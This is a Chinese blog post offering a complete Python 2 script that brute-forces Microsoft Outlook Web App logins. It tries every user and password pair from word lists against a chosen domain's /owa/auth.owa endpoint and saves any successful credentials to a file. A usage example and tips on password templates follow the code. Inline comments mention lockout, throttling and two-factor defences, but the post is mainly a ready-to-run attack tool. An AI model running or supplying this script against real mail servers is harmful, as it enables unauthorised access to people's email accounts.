
Outlook Exchange Python邮箱爆破脚本

May 27, 2016 • Security

修改自Lijiejie:Microsoft Outlook WebAPP暴力破解脚本

# Encoding=utf-8

# Outlook.py

import argparse

import httplib

import urllib

import time

import ssl

#ssl._create_default_http_context = ssl._create_unverified_context

# Command-line interface: three required positional arguments, in this order:
# target host name, user-name list file, password list file.
parser = argparse.ArgumentParser(
    description='Microsoft OutLook WebAPP Brute Forcer.',
)
for _arg_name, _arg_help in (
    ('domain', 'website domain name, e.g. email.baidu.com'),
    ('users', 'username dict file path, e.g. users.txt'),
    ('passwords', 'passwords dict file path, e.g. passwords.dic'),
):
    parser.add_argument(_arg_name, type=str, help=_arg_help)

# Parsed as soon as the module runs; argparse prints usage and exits when an
# argument is missing.
args = parser.parse_args()

# Load both word lists fully into memory before any request is made.
# Each file is read line by line, and reading stops at the first line that is
# empty after strip() -- that is, at end of file or at the first blank line,
# whichever comes first. Entries after a blank line are therefore ignored.
users = []
with open(args.users) as user_file:
    for raw_line in iter(user_file.readline, ''):
        entry = raw_line.strip()
        if not entry:
            break
        users.append(entry)

passwords = []
with open(args.passwords) as password_file:
    for raw_line in iter(password_file.readline, ''):
        entry = raw_line.strip()
        if not entry:
            break
        passwords.append(entry)




# Header set used for the logon POST. Every value is a constant except the
# host name inside Referer; 'Cookie' starts empty and is overwritten for each
# attempt by the main loop.
# For log review: the User-Agent below is a fixed, truncated MSIE 7 string
# (it ends in '; ' with no closing parenthesis) and Accept-Language is always
# 'zh-CN', so every request built from this dict carries the same pair.
_owa_referer = (
    'http://' + args.domain
    + '/owa/auth/logon.aspx?replaceCurrent=1&reason=2&url=http%3a%2f%2f'
    + args.domain
    + '%2fowa%2f'
)

headers = {
    'Accept': '*/*',
    'Referer': _owa_referer,
    'Accept-Language': 'zh-CN',
    'Content-Type': 'application/x-www-form-urlencoded',
    'User-Agent': 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; ',
    'Connection': 'Keep-Alive',
    'Cache-Control': 'no-cache',
    'Cookie': '',
}

# Main loop: one logon attempt per (user, password) pair, iterating every
# password for a user before moving to the next user.
#
# Seen from the server side, each pair produces a GET /owa/ followed by a
# POST /owa/auth.owa over HTTPS, each on a new connection, and nothing in
# this loop waits between attempts (`time` is imported above but not used in
# this listing). Controls that address this request pattern are lockout or
# throttling of repeated failed logons per account and per source address,
# and a second authentication factor on the OWA logon.
for user in users:

    for pwd in passwords:

        # A password-list entry may contain the literal text '<user>'; it is
        # replaced with the user name currently being tested.
        pwd = pwd.replace('<user>', user)

        print 'testing', user, ' -- ', pwd

        # Response headers of the preliminary GET; stays empty if the GET fails.
        res={}

        # Only one try for the GET: tryt starts at 1 and the except branch
        # below also breaks out of the loop.
        tryt=1

        while True and tryt > 0:

            try:

                conn = httplib.HTTPSConnection(args.domain)

                conn.request(method='GET', url='/owa/')

                res = dict(conn.getresponse().getheaders())

                conn.close()

                break

            except Exception, e:

                tryt -= 1

                print e

                print '!!!Error occured #1'

                break

        session=''

        # Tests for the key 'Set-Cookie' and, when present, keeps the first
        # ';'-separated field of the value stored under 'set-cookie'.
        # Otherwise session remains the empty string.
        if res.has_key('Set-Cookie'):

            session = res['set-cookie'].split(';')[0]     # Get Session ID

        # Plain assignment, not a copy: headers2 is the same dict object as
        # headers, so the Cookie written here is also visible through headers.
        headers2 = headers

        headers2['Cookie'] = 'OutlookSession=%s ; PBack=0' % session

        # Form fields of the logon POST. Besides the credentials, a 'Cookie'
        # entry is sent as a form field in addition to the Cookie header.
        data = {'destination': 'http://%s/owa/' % args.domain,

                'flags': '0', 'forcedownlevel': '0', 'trusted':'0',

                'username':user, 'password':pwd,

                'isUtf8':'1', 'Cookie': 'OutlookSession=%s; PBack=0' % session}

        # The POST is tried up to three times.
        tryt = 3

        # Default that counts as "failed" in the check after the loop, used
        # when every POST attempt raises.
        url='reason='

        while True and tryt > 0:

            try:

                conn = httplib.HTTPSConnection(args.domain)

                conn.request(method='POST', url='/owa/auth.owa', body=urllib.urlencode(data), headers=headers2)

                # A response without a 'location' header raises KeyError here,
                # which the except branch below handles like any other error.
                url = dict(conn.getresponse().getheaders())['location']

                conn.close()

                break

            except Exception, e:

                tryt -= 1

                print e

                print '!!!Error occured #2'

        # Success criterion: the redirect target does not contain 'reason='.
        # Presumably the logon page redirects back with a reason= parameter
        # when the credentials are rejected -- inferred from this check only.
        if url.find('reason=') < 0:

            print '(SUCESS)>> User:', user, 'Password:', pwd

            # Each hit is appended as "user password" in clear text to
            # cracked_email.txt, a relative path resolved against the current
            # working directory.
            with open('cracked_email.txt', 'a') as outFile:

                outFile.write(user + ' ' + pwd + '\n')

使用方法:

Outlook.py mail.xxx.cn  user.txt pass.txt

pass.txt中可以引用user字段方式:

<user>123

<user>123456